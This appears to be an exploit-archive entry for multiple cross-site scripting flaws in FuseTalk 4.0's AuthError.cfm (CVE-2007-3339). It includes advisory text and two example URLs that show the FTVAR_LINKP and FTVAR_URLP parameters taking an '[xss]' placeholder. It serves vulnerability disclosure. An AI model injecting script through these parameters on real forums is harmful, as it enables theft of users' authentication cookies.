FuseTalk 4.0 - 'AuthError.cfm' Multiple Cross-Site Scripting Vulnerabilities
Author: Ivan Almuina
type: webapps
platform: cfm
port:
date_added: 2007-06-20
date_updated: 2013-12-11
verified: 1
codes: CVE-2007-3339;OSVDB-37141
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/24564/info
FuseTalk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/forum/include/error/autherror.cfm?errorcode=1
&FTVAR_LINKP=[xss]
http://www.example.com/blog/forum/include/error/autherror.cfm?errorcode=1
&FTVAR_URLP=[xss]